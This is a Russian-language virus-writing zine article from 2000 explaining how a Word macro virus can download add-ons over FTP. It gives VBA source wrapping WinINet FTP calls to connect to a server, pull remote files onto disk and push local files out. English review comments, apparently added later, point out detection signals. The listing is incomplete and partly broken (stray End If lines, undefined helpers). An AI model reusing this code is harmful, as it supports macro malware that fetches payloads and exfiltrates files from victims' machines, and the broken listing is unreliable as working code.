В этой статье я попробую рассказать - о подкачке вирусом дополнений из интернета для макро зверей... Всего несколько метавирусов были выпущенны на свет, вирумакеры не стали писать таких вирей из того что это давольно геморно. Я тоже не смог написать такой вирус на asm один, и я решил написать этот вирус с маленьким составом. При написание такого вируса я подумал а почему на асме? и только для win32, и выпив пивка я решил написать макро вирус с подкачкой. Мне хотелось что нибудь оригинальное и я решил сделать это через FTP. Писал я это пока пиво не закончилось, тут описан маленький кусок алгоритма. Это просто первая папыика написать вирус под w0rd с плагинами.
ULTRAS[MATRiX] (c) 2000
Начало кода
~~~~~~~~~~~
Этот метод использует windoze api.

' NOTE(review): the static signal in this part of the listing is a run of
' Declare statements that bind FTP-related exports of wininet.dll
' (FtpGetFileA, FtpPutFileA, FtpSetCurrentDirectoryA, FtpGetCurrentDirectoryA,
' InternetOpenA, InternetConnectA). The article states the intended host is a
' Word macro; WinINet FTP imports in document macro code are uncommon in
' legitimate documents and are a reasonable thing to match on when scanning
' macro source.

' WinINet API: FtpGetFile - retrieves a file from the FTP server and stores it
' under a local name. The article uses it to fetch the add-on ("plugin") file.
Private Declare Function FtpGetFile Lib "wininet.dll" Alias "FtpGetFileA" _
    (ByVal hftpSession As Long, _
    ByVal lpszRemoteFile As String, _
    ByVal lpszNewFile As String, _
    ByVal fFailIfExists As Boolean, _
    ByVal dwFlagsAndAttributes As Long, _
    ByVal dwFlags As Long, _
    ByVal dwContext As Long) _
    As Boolean

' WinINet API: FtpPutFile - stores a local file on the FTP server.
' (The original comment repeated "download" here; this export is the upload
' direction, as the PutFile wrapper later in the article also says.)
Private Declare Function FtpPutFile Lib "wininet.dll" Alias "FtpPutFileA" _
    (ByVal hftpSession As Long, _
    ByVal lpszLocalFile As String, _
    ByVal lpszRemoteFile As String, _
    ByVal dwFlags As Long, _
    ByVal dwContext As Long) _
    As Boolean

' Author's note: these two directory APIs are declared because they may be
' needed; nothing in the visible listing calls them by name.
Private Declare Function FtpSetCurrentDirectory Lib "wininet.dll" _
    Alias "FtpSetCurrentDirectoryA" _
    (ByVal hftpSession As Long, _
    ByVal lpszDirectory As String) _
    As Boolean

Private Declare Function FtpGetCurrentDirectory Lib "wininet.dll" _
    Alias "FtpGetCurrentDirectoryA" _
    (ByVal hftpSession As Long, _
    ByVal lpszCurrentDirectory As String, _
    lpdword As Long) _
    As Boolean

' WinINet API: InternetOpen - returns the session handle used by later calls.
Private Declare Function InternetOpen _
    Lib "wininet.dll" _
    Alias "InternetOpenA" _
    (ByVal sAgent As String, _
    ByVal lAccessType As Long, _
    ByVal sProxyName As String, _
    ByVal sProxyBypass As String, _
    ByVal lFlags As Long) _
    As Long

' Miscellaneous constants: access type for InternetOpen, transfer type and
' passive-mode flag for the FTP calls.
Private Const INTERNET_OPEN_TYPE_PRECONFIG As Long = 0
Private Const INTERNET_OPEN_TYPE_DIRECT As Long = 1
Private Const INTERNET_OPEN_TYPE_PROXY As Long = 3
Private Const INTERNET_INVALID_PORT_NUMBER As Long = 0
Private Const FTP_TRANSFER_TYPE_ASCII As Long = &H1
Private Const FTP_TRANSFER_TYPE_BINARY As Long = &H2
Private Const INTERNET_FLAG_PASSIVE As Long = &H8000000

' WinINet API: InternetConnect - opens a connection to a named server for a
' given service; server name, user name and password are plain string
' parameters.
Private Declare Function InternetConnect _
    Lib "wininet.dll" _
    Alias "InternetConnectA" _
    (ByVal hInternetSession As Long, _
    ByVal sServerName As String, _
    ByVal nServerPort As Integer, _
    ByVal sUsername As String, _
    ByVal sPassword As String, _
    ByVal lService As Long, _
    ByVal lFlags As Long, _
    ByVal lContext As Long) _
    As Long

' WinINet error codes, expressed as offsets from INTERNET_ERROR_BASE (12000).
' None of these names is referenced by the functions shown in the article.
Private Const INTERNET_ERROR_BASE = 12000
Private Const ERROR_INTERNET_OUT_OF_HANDLES As Long = (INTERNET_ERROR_BASE + 1)
Private Const ERROR_INTERNET_TIMEOUT As Long = (INTERNET_ERROR_BASE + 2)
Private Const ERROR_INTERNET_EXTENDED_ERROR As Long = (INTERNET_ERROR_BASE + 3)
Private Const ERROR_INTERNET_INTERNAL_ERROR As Long = (INTERNET_ERROR_BASE + 4)
Private Const ERROR_INTERNET_INVALID_URL As Long = (INTERNET_ERROR_BASE + 5)
Private Const ERROR_INTERNET_UNRECOGNIZED_SCHEME As Long = (INTERNET_ERROR_BASE + 6)
Private Const ERROR_INTERNET_NAME_NOT_RESOLVED As Long = (INTERNET_ERROR_BASE + 7)
Private Const ERROR_INTERNET_PROTOCOL_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 8)
Private Const ERROR_INTERNET_INVALID_OPTION As Long = (INTERNET_ERROR_BASE + 9)
Private Const ERROR_INTERNET_BAD_OPTION_LENGTH As Long = (INTERNET_ERROR_BASE + 10)
Private Const ERROR_INTERNET_OPTION_NOT_SETTABLE As Long = (INTERNET_ERROR_BASE + 11)
Private Const ERROR_INTERNET_SHUTDOWN As Long = (INTERNET_ERROR_BASE + 12)
Private Const ERROR_INTERNET_INCORRECT_USER_NAME As Long = (INTERNET_ERROR_BASE + 13)
Private Const ERROR_INTERNET_INCORRECT_PASSWORD As Long = (INTERNET_ERROR_BASE + 14)
Private Const ERROR_INTERNET_LOGIN_FAILURE As Long = (INTERNET_ERROR_BASE + 15)
Private Const ERROR_INTERNET_INVALID_OPERATION As Long = (INTERNET_ERROR_BASE + 16)
Private Const ERROR_INTERNET_OPERATION_CANCELLED As Long = (INTERNET_ERROR_BASE + 17)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_TYPE As Long = (INTERNET_ERROR_BASE + 18)
Private Const ERROR_INTERNET_INCORRECT_HANDLE_STATE As Long = (INTERNET_ERROR_BASE + 19)
Private Const ERROR_INTERNET_NOT_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 20)
Private Const ERROR_INTERNET_REGISTRY_VALUE_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 21)
Private Const ERROR_INTERNET_BAD_REGISTRY_PARAMETER As Long = (INTERNET_ERROR_BASE + 22)
Private Const ERROR_INTERNET_NO_DIRECT_ACCESS As Long = (INTERNET_ERROR_BASE + 23)
Private Const ERROR_INTERNET_NO_CONTEXT As Long = (INTERNET_ERROR_BASE + 24)
Private Const ERROR_INTERNET_NO_CALLBACK As Long = (INTERNET_ERROR_BASE + 25)
Private Const ERROR_INTERNET_REQUEST_PENDING As Long = (INTERNET_ERROR_BASE + 26)
Private Const ERROR_INTERNET_INCORRECT_FORMAT As Long = (INTERNET_ERROR_BASE + 27)
Private Const ERROR_INTERNET_ITEM_NOT_FOUND As Long = (INTERNET_ERROR_BASE + 28)
Private Const ERROR_INTERNET_CANNOT_CONNECT As Long = (INTERNET_ERROR_BASE + 29)
Private Const ERROR_INTERNET_CONNECTION_ABORTED As Long = (INTERNET_ERROR_BASE + 30)
Private Const ERROR_INTERNET_CONNECTION_RESET As Long = (INTERNET_ERROR_BASE + 31)
Private Const ERROR_INTERNET_FORCE_RETRY As Long = (INTERNET_ERROR_BASE + 32)
Private Const ERROR_INTERNET_INVALID_PROXY_REQUEST As Long = (INTERNET_ERROR_BASE + 33)
Private Const ERROR_INTERNET_NEED_UI As Long = (INTERNET_ERROR_BASE + 34)
Private Const ERROR_INTERNET_HANDLE_EXISTS As Long = (INTERNET_ERROR_BASE + 36)
Private Const ERROR_INTERNET_SEC_CERT_DATE_INVALID As Long = (INTERNET_ERROR_BASE + 37)
Private Const ERROR_INTERNET_SEC_CERT_CN_INVALID As Long = (INTERNET_ERROR_BASE + 38)
Private Const ERROR_INTERNET_HTTP_TO_HTTPS_ON_REDIR As Long = (INTERNET_ERROR_BASE + 39)
Private Const ERROR_INTERNET_HTTPS_TO_HTTP_ON_REDIR As Long = (INTERNET_ERROR_BASE + 40)
Private Const ERROR_INTERNET_MIXED_SECURITY As Long = (INTERNET_ERROR_BASE + 41)
Private Const ERROR_INTERNET_CHG_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 42)
Private Const ERROR_INTERNET_POST_IS_NON_SECURE As Long = (INTERNET_ERROR_BASE + 43)
Private Const ERROR_INTERNET_CLIENT_AUTH_CERT_NEEDED As Long = (INTERNET_ERROR_BASE + 44)
Private Const ERROR_INTERNET_INVALID_CA As Long = (INTERNET_ERROR_BASE + 45)
Private Const ERROR_INTERNET_CLIENT_AUTH_NOT_SETUP As Long = (INTERNET_ERROR_BASE + 46)
Private Const ERROR_INTERNET_ASYNC_THREAD_FAILED As Long = (INTERNET_ERROR_BASE + 47)
Private Const ERROR_INTERNET_REDIRECT_SCHEME_CHANGE As Long = (INTERNET_ERROR_BASE + 48)
Private Const ERROR_INTERNET_DIALOG_PENDING As Long = (INTERNET_ERROR_BASE + 49)
Private Const ERROR_INTERNET_RETRY_DIALOG As Long = (INTERNET_ERROR_BASE + 50)
Private Const ERROR_INTERNET_HTTPS_HTTP_SUBMIT_REDIR As Long = (INTERNET_ERROR_BASE + 52)
Private Const ERROR_INTERNET_INSERT_CDROM As Long = (INTERNET_ERROR_BASE + 53)

' FTP API Errors
Private Const ERROR_FTP_TRANSFER_IN_PROGRESS As Long = (INTERNET_ERROR_BASE + 110)
Private Const ERROR_FTP_DROPPED As Long = (INTERNET_ERROR_BASE + 111)
Private Const ERROR_FTP_NO_PASSIVE_MODE As Long = (INTERNET_ERROR_BASE + 112)

' Number of the TCP/IP port on the server to connect to.
Private Const INTERNET_DEFAULT_FTP_PORT As Long = 21
Private Const INTERNET_DEFAULT_GOPHER_PORT As Long = 70
Private Const INTERNET_DEFAULT_HTTP_PORT As Long = 80
Private Const INTERNET_DEFAULT_HTTPS_PORT As Long = 443
Private Const INTERNET_DEFAULT_SOCKS_PORT As Long = 1080

' Option identifiers (timeouts, credentials, proxy credentials); not
' referenced by the functions shown below.
Private Const INTERNET_OPTION_CONNECT_TIMEOUT As Long = 2
Private Const INTERNET_OPTION_RECEIVE_TIMEOUT As Long = 6
Private Const INTERNET_OPTION_SEND_TIMEOUT As Long = 5
Private Const INTERNET_OPTION_USERNAME As Long = 28
Private Const INTERNET_OPTION_PASSWORD As Long = 29
Private Const INTERNET_OPTION_PROXY_USERNAME As Long = 43
Private Const INTERNET_OPTION_PROXY_PASSWORD As Long = 44

' Service selector passed to InternetConnect; only the FTP value is used here.
Private Const INTERNET_SERVICE_FTP As Long = 1
Private Const INTERNET_SERVICE_GOPHER As Long = 2
Private Const INTERNET_SERVICE_HTTP As Long = 3

Private Const INTERNET_FLAG_RELOAD As Long = &H80000000
Private Const INTERNET_FLAG_KEEP_CONNECTION As Long = &H400000
Private Const INTERNET_FLAG_MULTIPART As Long = &H200000
Private Const GENERIC_READ As Long = &H80000000
Private Const GENERIC_WRITE As Long = &H40000000

' Declared but not called anywhere in the visible listing.
Private Declare Function FtpOpenFile _
    Lib "wininet.dll" _
    Alias "FtpOpenFileA" _
    (ByVal hftpSession As Long, _
    ByVal sFileName As String, _
    ByVal lAccess As Long, _
    ByVal lFlags As Long, _
    ByVal lContext As Long) _
    As Long

' Declared but not called anywhere in the visible listing.
Private Declare Function FtpDeleteFile _
    Lib "wininet.dll" _
    Alias "FtpDeleteFileA" _
    (ByVal hftpSession As Long, _
    ByVal lpszFileName As String) _
    As Boolean

' Closes a WinINet handle; used by Disconnect on the connection handle.
Private Declare Function _
    InternetCloseHandle _
    Lib "wininet.dll" _
    (ByVal hInet As Long) _
    As Integer

' Private variables to support class properties
Private u_strProxyString As String
Private u_lngSessionHandle As Long
Private u_lngConnectionHandle As Long
Private u_fSessionActive As Boolean
Private u_strUserName As String
Private u_strPassword As String
Private u_strServer As String
Private u_lngTransferType As Long
Private u_strLastDLLError As String

' Connect to the FTP server.
Public Function Connect() As Boolean
    ' Comments : Connects to the FTP server. Resets the state fields, copies
    '            server / user name / password from txtServer, txtUserName and
    '            txtPassword (not defined in this listing), then calls
    '            InternetConnect for the FTP service with the passive flag.
    ' Returns  : True on success, False otherwise
    '
    ' NOTE(review): the service is plain FTP (INTERNET_SERVICE_FTP), which
    ' carries the user name, password and file names unencrypted, so the
    ' server and account used by code like this are visible to network
    ' monitoring. The port argument is INTERNET_INVALID_PORT_NUMBER (0), which
    ' WinINet documents as "use the default port for the service".
    Dim fConnected As Boolean
    On Error GoTo errorz
    u_fSessionActive = False
    u_lngSessionHandle = 0
    u_lngConnectionHandle = 0
    u_strServer = txtServer ' server address
    u_strUserName = txtUserName ' user name
    u_strPassword = txtPassword ' password
    u_lngConnectionHandle = InternetConnect(u_lngSessionHandle, u_strServer, _
        INTERNET_INVALID_PORT_NUMBER, u_strUserName, u_strPassword, _
        INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0)
    GetDLLError
    ' Check what came back: a non-zero handle is treated as connected
    If u_lngConnectionHandle <> 0 Then
        ' Mark the session as active
        fConnected = True
        u_fSessionActive = True
    Else
        fConnected = False
    End If
    ' The next three End If lines are reproduced exactly as published.
    End If
    End If
    End If
_ret:
    Connect = fConnected
    Exit Function
errorz:
    MsgBox "Ошибка"
    resume _ret
End Function

' Disconnect from the FTP server.
Public Sub Disconnect()
    On Error GoTo errorz
    ' Only disconnect if there is a connection handle
    If u_lngConnectionHandle <> 0 Then
        ClearDLLError
        ' Close the connection handle
        InternetCloseHandle u_lngConnectionHandle
        ' Record the DLL error value
        GetDLLError
        ' Reset the connection handle
        u_lngConnectionHandle = 0
        ' Clear the session-active flag
        u_fSessionActive = False
    End If
_ret:
    Exit Sub
errorz:
    MsgBox "Ошибка"
    Resume _ret
End Sub

' Resets the stored last-DLL-error text to an empty string.
Private Sub ClearDLLError()
    u_strLastDLLError = ""
End Sub

' Stores Err.LastDLLError in u_strLastDLLError (a String field).
Private Sub GetDLLError()
    On Error GoTo errorz
    u_strLastDLLError = Err.LastDLLError
_ret:
    Exit Sub
errorz:
    MsgBox "Ошибка"
    Resume _ret
End Sub

Public Function OpenSession() As Boolean
    ' Comments : Opens a WinINet session via InternetOpen: direct access when
    '            u_strProxyString is empty, otherwise through that proxy.
    '            mcstrUserAgent is not defined in this listing.
    ' Returns  : True if the session opened succesfully, False otherwise
    Dim fOpened As Boolean
    On Error GoTo errorz
    ' Start from the failed state
    fOpened = False
    ClearDLLError
    If u_strProxyString = "" Then
        u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_DIRECT, _
            vbNullString, vbNullString, 0)
    Else
        u_lngSessionHandle = InternetOpen(mcstrUserAgent, INTERNET_OPEN_TYPE_PROXY, _
            u_strProxyString, vbNullString, 0)
    End If
    GetDLLError
    fOpened = (u_lngSessionHandle <> 0)
_ret:
    OpenSession = fOpened
    Exit Function
errorz:
    MsgBox "Ошибка"
    Resume _ret
End Function

' File download (the article's "download plugin" step).
Public Function GetFile( _
    strRemoteFile As String, _
    strLocalFile As String) _
    As Boolean
    ' Comments  : Downloads a file from the FTP server to a local path.
    ' Parameters: strRemoteFile - path and name of the file on the FTP server
    '             strLocalFile - path and name of the local file to write
    ' Returns   : True on success, False otherwise (fRetval is only assigned
    '             when the session is active and both names are non-empty)
    '
    ' NOTE(review): this is the step that writes remotely supplied content to
    ' local disk. fFailIfExists is passed as False, so per the WinINet
    ' documentation an existing file at strLocalFile is overwritten. A file
    ' created by the document-handling process right after an FTP transfer is
    ' the observable an endpoint sensor would report for this call.
    Dim fRetval As Boolean
    Dim strFileOnRemote As String
    Dim strDirOnRemote As String
    On Error GoTo errorz
    ' Only proceed when Connect has marked the session active
    If u_fSessionActive Then
        ' Both file names must be non-empty
        If strRemoteFile <> "" And strLocalFile <> "" Then
            ' Split the remote path into directory and file name.
            ' GetPathFromFTPPath / GetNameFromFTPPath are not shown in the
            ' article; presumably they return those two parts - confirm.
            strDirOnRemote = GetPathFromFTPPath(strRemoteFile)
            strFileOnRemote = GetNameFromFTPPath(strRemoteFile)
            ' Change directory on the remote server (RemoteChDir is not shown)
            RemoteChDir strDirOnRemote
            ClearDLLError
            ' Transfer the file; INTERNET_FLAG_RELOAD is OR-ed with the
            ' configured transfer type. FILE_ATTRIBUTE_NORMAL is not declared
            ' in this listing.
            fRetval = FtpGetFile(u_lngConnectionHandle, strFileOnRemote, _
                strLocalFile, False, FILE_ATTRIBUTE_NORMAL, _
                INTERNET_FLAG_RELOAD Or u_lngTransferType, 0)
            GetDLLError
        End If
    End If
_ret:
    GetFile = fRetval
    Exit Function
errorz:
    MsgBox "Ошибка"
    Resume _ret
End Function

' File upload (the article's "upload plugin" step).
Public Function PutFile( _
    strLocalFile As String, _
    strRemoteFile As String) _
    As Boolean
    ' Comments  : Uploads a local file to the FTP server.
    ' Parameters: strLocalFile - path and name of the local file
    '             strRemoteFile - path and name of the remote file
    ' Returns   : True on success, False otherwise
    '
    ' NOTE(review): FtpPutFile moves a local file to the remote server, so the
    ' same wrapper is also an outbound file channel. Outbound FTP originating
    ' from a document-handling process is worth alerting on.
    Dim fRetval As Boolean
    Dim strFileOnRemote As String
    Dim strDirOnRemote As String
    Dim strFileOnLocal As String
    Dim strTmp As String
    On Error GoTo errorz
    ' Only proceed when Connect has marked the session active
    If u_fSessionActive Then
        ' Both file names must be non-empty
        If strLocalFile <> "" And strRemoteFile <> "" Then
            ' Parse file names: the remote directory is whatever remains of
            ' strRemoteFile after dropping Len(u_strServer) leading characters
            strTmp = strRemoteFile
            strDirOnRemote = Right(strTmp, Len(strTmp) - Len(u_strServer))
            strFileOnRemote = strRemoteFile
            strFileOnLocal = strLocalFile
            ' Fall back to the root directory when nothing remains
            If (strDirOnRemote = "") Then
                strDirOnRemote = "/"
            End If
            ' Change to the required directory on the FTP server
            RemoteChDir strDirOnRemote
            ClearDLLError
            ' Send the file to the FTP server
            fRetval = FtpPutFile(u_lngConnectionHandle, strFileOnLocal, _
                strFileOnRemote, u_lngTransferType, 0)
            ' Record the DLL error value
            GetDLLError
        End If
    End If
_ret:
    PutFile = fRetval
    Exit Function
errorz:
    MsgBox "Ошибка"
    Resume _ret
End Function

Ну вот и все правдо может я параметры некоторые не написал влом мне проверять, пиво закончилось.. Некоторые опций я не описал типа FtpSetCurrentDirectory там и так все ясно, короче идея есть немного кода есть хватит чтобы чтонибудь написать.... Некоторые параметры придется изменить так как писал я не в ворде a в VB 6.0. Могут быть глюки, они и у меня были потому что я не все до конца отладил, но все таки это работало. Just do it...
L0rd Ultra (с) 2000 |